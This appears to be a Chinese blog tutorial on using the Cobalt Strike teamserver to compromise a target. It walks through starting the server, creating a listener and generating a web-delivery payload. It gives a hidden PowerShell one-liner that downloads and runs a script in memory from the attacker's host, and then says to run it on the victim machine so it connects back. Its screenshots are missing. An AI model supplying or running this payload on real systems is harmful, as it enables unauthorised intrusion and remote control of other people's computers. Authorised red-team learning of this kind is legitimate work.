cobaltstrike用teamserver连接攻击目标

官网:https://www.cobaltstrike.com/

Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。

Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。

启动服务器端:

./teamserver 192.168.6.134 123456

服务端所在的ip,密码自己随意

客户端连接:

linux下

./cobaltstrike  

teamserver连接攻击目标

步骤

  1. 设置监听器(linster)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

这里是个传输器,这个IP和上面的IP一致

在这里插入图片描述

  1. 生成攻击载荷

在这里插入图片描述

选择web脚本木马
在这里插入图片描述

这个监听器,就是刚刚设置的监听器

url它是个文件路径

就是让目标 (受害者)通过这个地址和端口下载 恶意脚本

在这里插入图片描述

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.6.134:80/a’))”

我们访问这个url,可以看到这个脚本内容
在这里插入图片描述

这个是载入内存中运行的
在这里插入图片描述

查看web日志,可以看到访问记录

  1. 目标机子运行

在这里插入图片描述

在目标机上执行,这个代码,在cmd下或powershell下执行,都可以
在这里插入图片描述

在cs上就可以看到,目标机连接上了teamserver
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值